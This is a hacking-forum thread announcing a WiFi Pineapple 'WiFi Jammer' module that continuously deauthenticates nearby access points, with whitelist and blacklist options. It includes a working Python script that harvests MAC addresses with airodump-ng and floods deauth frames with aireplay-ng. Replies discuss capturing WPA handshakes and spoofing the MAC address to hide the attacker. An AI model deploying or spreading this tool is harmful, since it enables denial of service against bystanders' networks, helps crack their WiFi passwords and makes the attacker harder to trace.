Wifi Jammer

[Whistle Master]

Hi there !

I wanted to share with you my last module for the pineapple: a WiFi Jammer ;)

Features
- Using deauth with aireplay
- Whitelist / Blacklist based on regexp
- Autostart

Screenshots

Simplified Usage

- Select the interface to be used from WLAN interface drop-down list (e.g. wlan1).

- Click on Start Monitor.

- Monitor interface drop-down list will be refreshed (e.g. mon0).

- Click on Whitelist tab and click on Refresh link to show APs around and click on APs to be added to your whitelist which will be NOT DeAuth'ed.

- Click on Start link next to WiFi Jammer disabled

Troubleshooting procedure

1. No APs are found in the Whitelist or Blacklist

Select the interface from WLAN interface drop-down list (e.g. wlan1) and click on Auto to disable and re-enable the interface. Then try again.

2. No APs are DeAuth'ed

Select the interface from WLAN interface drop-down list (e.g. wlan1) and click on Auto to disable and re-enable the interface. Then try again.

Edited July 13, 2013 by Whistle Master

[Radau]

So you can allow certain connections through with the whitelist, while constantly deauthing others?

[Whistle Master]

Yes, you can add AP(s) in the whitelist which won't be deAuth'ed, while the others will be deAuth'ed constantly :)

EDIT: I added also a blacklist to bring more flexibility to the jammer.

Edited May 20, 2012 by Whistle Master

[bobbyb1980]

I was working on something extremely similar a few weeks ago but I don't have one of the new pineapples to test it on. I used regular expressions too. I'll post it here and perhaps you could integrate it to the pineapple, no web interface though : P

"""
This script is designed to deauthenticate all macs found in the air
with the exception of whitelisted ones. Input known good client and
AP and all other MACs on 2.4 ghz in the area are denied service. 
"""

import subprocess
import time
import sys
import re
import sys

iface = 'mon0'

# List of macs to deauth
todeauth = []

# Don't deauth
mymac = ''
myap = ''

searchmac = re.compile(r'([a-fA-F0-9]{2}[:|\-]){5}[a-fA-F0-9]{2}')

# Takes all macs from airodump-ng stderr and puts them into list
def grabMacs():
    proc = subprocess.Popen(['airodump-ng',
                             '%s' % iface],
                            stdout = subprocess.PIPE,
                            stderr = subprocess.PIPE,
                            executable='/usr/sbin/airodump-ng')
    print('one second. im thinking...')
    time.sleep(10)
    for x in proc.stderr:
        a = searchmac.search(x)
        if a:
            todeauth.append(x[a.start():a.end()])
            print(x[a.start():a.end()])
        elif len(todeauth) > 15: break
    sys.stdout.flush()

# Takes all macs from airodump-ng output csv file and puts into list
def snabMacs():
    subprocess.Popen(['airodump-ng',
                     '-w', 'test1234-01.csv',
                     iface],
                     stderr = subprocess.PIPE)
    print('collecting MACs for 10 seconds...')
    time.sleep(10)
    file = open('test1234-01.csv-01.csv')
    for x in file:
        a = searchmac.search(x)
        if a:
            print(x[a.start():a.end()])
            todeauth.append(x[a.start():a.end()])

# Deauth all targets in todeauth list from grabMacs or snabMacs
# function. Will remove known good macs as mymac and myap input.
def massDeauth(todeauth, mymac, myap):
    if myap in todeauth:
        todeauth.remove(myap)
        print('known good ap was successfully removed from deauth list')
    elif mymac in todeauth:
        todeauth.remove(mymac)
        print('known good mac was sucessfully removed from deauth list')
    elif len(todeauth) > 0:
        print('starting deauths')
        for x in todeauth:
            proc = subprocess.Popen(['aireplay-ng',
                                     '-0','0','-a',
                                    x, iface],
                                    stdout = subprocess.PIPE,
                                    stderr = subprocess.PIPE)
            print('deauthing...')
            proc.terminate()


snabMacs()
time.sleep(3.5)
massDeauth(todeauth, mymac, myap)

[RebelCork]

Do we need an extra wi-fi card/ pineapple to both block/use karma?

[Whistle Master]

I was working on something extremely similar a few weeks ago but I don't have one of the new pineapples to test it on. I used regular expressions too. I'll post it here and perhaps you could integrate it to the pineapple, no web interface though : P

Thanks for your input. However, I made everything in shell scripts to keep CPU / memory footprint as low as possible :)

Do we need an extra wi-fi card/ pineapple to both block/use karma?

For the moment yes, because aireplay-ng does not work properly and you have to switch off / on the monitor interface before use it. But then, karma won't work anymore until the next reboot.

[bobbyb1980]

Cool whistlemaster. Never tried it using bash. This week I am going to start working on one that uses pylorcon to send the deauth packets so there is no dependency on aireplay-ng.

[Whistle Master]

I have a version ready to be tested, for those interested, please find send me a PM.

[Whistle Master]

First version is out ;)

[Whistle Master]

Last version nows add the possibility to use another wifi adapter.

[telot]

Just what the doctor (and 2.3.1!) ordered! Thanks for the update WM!

telot

[Anton]

Would i be right in saying that you can't browse the web whilst the router is jamming even if the routers address is added to the white list? Also the jammer does jam its own ap by default right? Awesome tool btw, thanks.

- Anton

[Dazzle]

Thank you very much for even more ways to use Jasager (when I finally get my USB>UART adapter to flash my ALFA)

How effective is it? I can imagine that only the A/Ps with the best signals will get a deauth.

[Whistle Master]

Would i be right in saying that you can't browse the web whilst the router is jamming even if the routers address is added to the white list? Also the jammer does jam its own ap by default right? Awesome tool btw, thanks.

- Anton

APs on the whitelist are not DeAuth'ed, so you should still be able to browse internet through AP not DeAuth'ed. By default, everything is DeAuth'ed :)

Thank you very much for even more ways to use Jasager (when I finally get my USB>UART adapter to flash my ALFA)

How effective is it? I can imagine that only the A/Ps with the best signals will get a deauth.

APs in sight of the pineapple will be DeAuth'ed.

[PineDominator]

hey WM great module:-D sorry I couldn't test last week:-(

2 things the link start monitor is cut, box needs to be wider I think.

and after starting the module using the NHA mon0 "btw works great and I was able to successfully whitelist the pineapple" when you press stop it's still running?

ps.

one thing I would love to see is a deauth mode that is controllable? as in run every 10 minutes deauthing only 1 to 5 packets so that I don't piss off too many people, also maybe there is a command one could pass using the button module to run jammer the one time/for 1 minute

just a thought.

[Whistle Master]

2 things the link start monitor is cut, box needs to be wider I think.

and after starting the module using the NHA mon0 "btw works great and I was able to successfully whitelist the pineapple" when you press stop it's still running?

Could you please send me a screenshot of the problem ? I'm testing my modules only with Firefox, assuming not too many people are using IE :-P

The stop button should stop everything, maybe with a little delay, because of the auto-refresh running which send continuously requests.

ps.

one thing I would love to see is a deauth mode that is controllable? as in run every 10 minutes deauthing only 1 to 5 packets so that I don't piss off too many people, also maybe there is a command one could pass using the button module to run jammer the one time/for 1 minute

just a thought.

Nice idea! I will have a look to add some settings :)

[PineDominator]

Could you please send me a screenshot of the problem ? I'm testing my modules only with Firefox, assuming not too many people are using IE :-P

The stop button should stop everything, maybe with a little delay, because of the auto-refresh running which send continuously requests.

Nice idea! I will have a look to add some settings :)

I am using firefox too v13.0.1

well it says it's stopped but my phone will continue to get deauthed, I left it for just over a minute, then stopped the monitor interface and that ended deauthing but I would imagine It's still running

[Whistle Master]

I am using firefox too v13.0.1

well it says it's stopped but my phone will continue to get deauthed, I left it for just over a minute, then stopped the monitor interface and that ended deauthing but I would imagine It's still running

Could you do a quick test: start the module from the web interface, then ssh to your pineapple and issue the following commands:

ps auxww

ps auxww | grep jammer.sh | grep -v -e grep | grep -v -e php

Then stop the module from the web interface and issue the same above commands from ssh and post all the output.

Thanks ;)

[Whistle Master]

A new version will be out soon with new functionalities to control the jammer: sleeping time & number of deauths to send.

[NullNull]

A new version will be out soon with new functionalities to control the jammer: sleeping time & number of deauths to send.

Perfect for automaticly capturing WPA handshake's :D

[unitex]

Is this module available for mk3? or maybe it can be easily ported.

[Sebkinne]

Is this module available for mk3? or maybe it can be easily ported.

No.

It could theoretically be ported but the module system is not available on the MK3 and may not ever fully be.

I am still hoping to bring out one last version of the MK3 firmware - it just takes a lot of time.

Best,

Sebkinne

[pyth0n]

does this fake the mac address before sending deauth packets out? Good tool, however, just want to make sure that it hides the correct pineapple identity..

[Whistle Master]

No it doesn't but if you use macchanger before, it will do the trick ;)

[condor]

how about a short tutorial? I can't seem to get this one working. I can, however, use my netbook and deauth my router. Just think it would be cool to be able to do it all from the pineapple. I assume WhistleMaster has it going. Oh, to be a guru of helmholtz resonation. I can't even get the damn awus 036h to work with my pineapples.